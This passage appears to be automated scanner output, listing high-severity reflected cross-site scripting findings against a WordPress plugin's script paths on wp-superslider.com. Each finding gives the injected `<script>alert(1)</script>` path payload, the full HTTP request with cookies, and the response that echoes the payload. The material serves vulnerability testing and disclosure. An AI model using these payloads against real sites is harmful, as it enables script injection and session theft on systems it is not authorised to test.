The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b83ff"><script>alert(1)</script>15d9ca5fa65 was submitted in the REST URL parameter 2. This input was echoed as b83ff\"><script>alert(1)</script>15d9ca5fa65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-contentb83ff"><script>alert(1)</script>15d9ca5fa65/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674582; expires=Thu, 02-Feb-2012 19:23:02 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-contentb83ff\"><script>alert(1)</script>15d9ca5fa65/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js" />
...[SNIP]...

4.208. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30690"><script>alert(1)</script>04ae898bca was submitted in the REST URL parameter 3. This input was echoed as 30690\"><script>alert(1)</script>04ae898bca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins30690"><script>alert(1)</script>04ae898bca/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins30690\"><script>alert(1)</script>04ae898bca/superslider-postsincat/js/mootools-1.2.3-core-yc.js" />
...[SNIP]...

4.209. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86e0b"><script>alert(1)</script>4f3b7f24e7a was submitted in the REST URL parameter 4. This input was echoed as 86e0b\"><script>alert(1)</script>4f3b7f24e7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat86e0b"><script>alert(1)</script>4f3b7f24e7a/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat86e0b\"><script>alert(1)</script>4f3b7f24e7a/js/mootools-1.2.3-core-yc.js" />
...[SNIP]...

4.210. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45505"><script>alert(1)</script>a19c334793e was submitted in the REST URL parameter 5. This input was echoed as 45505\"><script>alert(1)</script>a19c334793e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/js45505"><script>alert(1)</script>a19c334793e/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674587+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/js45505\"><script>alert(1)</script>a19c334793e/mootools-1.2.3-core-yc.js" />
...[SNIP]...

4.211. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ed6"><script>alert(1)</script>4a164db4c66 was submitted in the REST URL parameter 6. This input was echoed as b0ed6\"><script>alert(1)</script>4a164db4c66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.jsb0ed6"><script>alert(1)</script>4a164db4c66 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.jsb0ed6\"><script>alert(1)</script>4a164db4c66" />
...[SNIP]...

4.212. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e46a7"><script>alert(1)</script>c8efbec0fa1 was submitted in the REST URL parameter 1. This input was echoed as e46a7\"><script>alert(1)</script>c8efbec0fa1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitee46a7"><script>alert(1)</script>c8efbec0fa1/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/sitee46a7\"><script>alert(1)</script>c8efbec0fa1/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js" />
...[SNIP]...

4.213. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e52"><script>alert(1)</script>c7eda42390 was submitted in the REST URL parameter 2. This input was echoed as d2e52\"><script>alert(1)</script>c7eda42390 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-contentd2e52"><script>alert(1)</script>c7eda42390/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-contentd2e52\"><script>alert(1)</script>c7eda42390/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js" />
...[SNIP]...

4.214. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65a5f"><script>alert(1)</script>825999123a4 was submitted in the REST URL parameter 3. This input was echoed as 65a5f\"><script>alert(1)</script>825999123a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins65a5f"><script>alert(1)</script>825999123a4/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674582+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674582; expires=Thu, 02-Feb-2012 19:23:02 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins65a5f\"><script>alert(1)</script>825999123a4/superslider-postsincat/js/mootools-1.2.3.1-more.js" />
...[SNIP]...

4.215. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9979"><script>alert(1)</script>228c627681f was submitted in the REST URL parameter 4. This input was echoed as a9979\"><script>alert(1)</script>228c627681f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincata9979"><script>alert(1)</script>228c627681f/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincata9979\"><script>alert(1)</script>228c627681f/js/mootools-1.2.3.1-more.js" />
...[SNIP]...

4.216. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 928f1"><script>alert(1)</script>1c33f9cbad5 was submitted in the REST URL parameter 5. This input was echoed as 928f1\"><script>alert(1)</script>1c33f9cbad5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/js928f1"><script>alert(1)</script>1c33f9cbad5/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/js928f1\"><script>alert(1)</script>1c33f9cbad5/mootools-1.2.3.1-more.js" />
...[SNIP]...

4.217. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3aba1"><script>alert(1)</script>0cbb2f96b6 was submitted in the REST URL parameter 6. This input was echoed as 3aba1\"><script>alert(1)</script>0cbb2f96b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js3aba1"><script>alert(1)</script>0cbb2f96b6 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674586; expires=Thu, 02-Feb-2012 19:23:06 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js3aba1\"><script>alert(1)</script>0cbb2f96b6" />
...[SNIP]...

4.218. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f91c"><script>alert(1)</script>89e1dc2587 was submitted in the REST URL parameter 1. This input was echoed as 6f91c\"><script>alert(1)</script>89e1dc2587 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site6f91c"><script>alert(1)</script>89e1dc2587/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
